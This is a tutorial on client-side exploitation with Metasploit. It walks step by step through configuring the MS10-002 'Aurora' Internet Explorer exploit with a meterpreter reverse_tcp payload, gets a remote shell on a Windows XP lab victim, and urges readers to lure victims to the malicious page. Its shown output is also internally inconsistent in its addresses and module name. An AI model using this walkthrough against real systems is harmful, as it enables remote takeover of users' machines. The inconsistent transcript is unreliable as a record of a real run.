Client Side Exploitation Using Metasploit

In this tutorial we’ll be learning how to perform a basic client side exploitation using Metasploit. Note this tutorial is made for educational purposes only to help you understand how the exploit's can be exploited.

Client Side Attacks

Client side attacks are special types of attacks that mainly target Client Side Applications, eg : Web Browser , Download Client etc. These are Different from Server Side Applications as instead of targeting vulnerabilities in Server Side applications like : Web Server etc. It actually targets the client side application.

For demonstrating this attack we’ll be using the Metasploit Framework and Using one of its basic Client Side Exploit.

Lab Setup

The Lab Consists of a Victim and an Attacker Machine.

Code:

+++++++++++++++++++                   +++++++++++++++++++++
+ Attacker        +  ================ + Victim Machine    +
+                 +    Behind NAT     +                   +
+++++++++++++++++++                   +++++++++++++++++++++

Victim

The Victim Machine is running an Unlatched Windows XP SP1 machine; With Internet Explorer 6 Which is vulnerable to a Client Side Vulnerability.

Attacker

The Attacker’s Machine is running Backtrack 5 with Metasploit Installed.

I am using Virtual Machines to Setup my Lab, and the Network Type is set to NAT.

Now that we have setup our lab let the hacking begin.

Exploitation

First lets open up Metasploit Console , using ‘msfconsole’ :-

Code:

  root@bt:~# msfconsole
   
                  __.                       .__.        .__. __.
    _____   _____/  |______    ____________ |  |   ____ |__|/  |_
   /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
  |  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
  |__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
        \/     \/          \/     \/ |__|
   
   
         =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
  + -- --=[ 688 exploits - 357 auxiliary - 39 post
  + -- --=[ 217 payloads - 27 encoders - 8 nops
  msf >

Though Metasploit provides hundreds of exploits to exploit Internet Explorer 6, for this tutorial we’ll be using the Internet Explorer Aurora Exploit.

To use this exploit in Metasploit simple use the ‘use’ command:-

Code:

  msf > use exploit/windows/browser/ms10_002_aurora
   
  msf exploit(ms10_002_aurora) >

Now let’s have a look at the options:-

Code:

  msf exploit(ms10_002_aurora) > show options
   
  Module options (exploit/windows/browser/ms10_002_aurora):
   
     Name        Current Setting  Required  Description
     ----        ---------------  --------  -----------
     SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
     SRVPORT     8080             yes       The local port to listen on.
     SSL         false            no        Negotiate SSL for incoming connections
     SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
     URIPATH                      no        The URI to use for this exploit (default is random)
   
   
  Exploit target:
   
     Id  Name
     --  ----
     0   Automatic

Now let’s set them!

Code:

  msf exploit(ms10_002_aurora) > set SRVHOST 127.0.0.1
  SRVHOST => 127.0.0.1
  msf exploit(ms10_002_aurora) > set SRVPORT 80
  SRVPORT => 80
  msf exploit(ms10_002_aurora) > set URIPATH /
  URIPATH => /
  msf exploit(ms10_002_aurora) >

Above we set the Server to localhost i.e 127.0.0.1 , Server port to 80 and the URI path to ‘/’ (ROOT).

Now let’s Set some Payload Options:-

Code:

  msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
  PAYLOAD => windows/meterpreter/reverse_tcp
  msf exploit(ms10_002_aurora) > show options
   
  Module options (exploit/windows/browser/ms10_002_aurora):
   
     Name        Current Setting  Required  Description
     ----        ---------------  --------  -----------
     SRVHOST     127.0.0.1        yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
     SRVPORT     80               yes       The local port to listen on.
     SSL         false            no        Negotiate SSL for incoming connections
     SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
     URIPATH     /                no        The URI to use for this exploit (default is random)
   
   
  Payload options (windows/meterpreter/reverse_tcp):
   
     Name      Current Setting  Required  Description
     ----      ---------------  --------  -----------
     EXITFUNC  process          yes       Exit technique: seh, thread, process, none
     LHOST                      yes       The listen address
     LPORT     4444             yes       The listen port
   
   
  Exploit target:
   
     Id  Name
     --  ----
     0   Automatic
   
   
  msf exploit(ms10_002_aurora) > set LHOST 120.0.0.1
  LHOST => 120.0.0.1
  msf exploit(ms10_002_aurora) > set LPORT 31337
  LPORT => 31337
  msf exploit(ms10_002_aurora) >

Above we set the Payload to reverse_tcp , the listening server to localhost and the listening Port to 31337.

Now that all is setup, let’s launch the exploit:-

Code:

   
  msf exploit(ms10_002_aurora) > exploit
  
Exploit running as background job.
Started reverse handler on 127.0.0.1:31337 
Using URL: http://127.0.0.1:80/
Server started.

The malicious web page is sitting on our server (URL: http://127.0.0.1:80/) , Now all you have to do is direct victim to this webpage and if they are running an exploitable version on Windows XP they’ll get owned!

In this case I’ll use vulnerable IE browser on the Victim Machine to view this site , Now see what happens:-

Code:

Sending stage (723456 bytes)

Meterpreter session 1 opened (192.168.0.1:31337 -> 192.168.0.2:1514)

msf exploit(ie_aurora) > sessions -i 1

Starting interaction with 1...

meterpreter > getuid
Server username: WINXP\VICTIM

We got a meterpreter session. Now you can use this to execute any command on the system. Thus the victim machine got owned.

That’s all for this tutorial stay tuned for more.

Share this

Share on FacebookPlus on Google+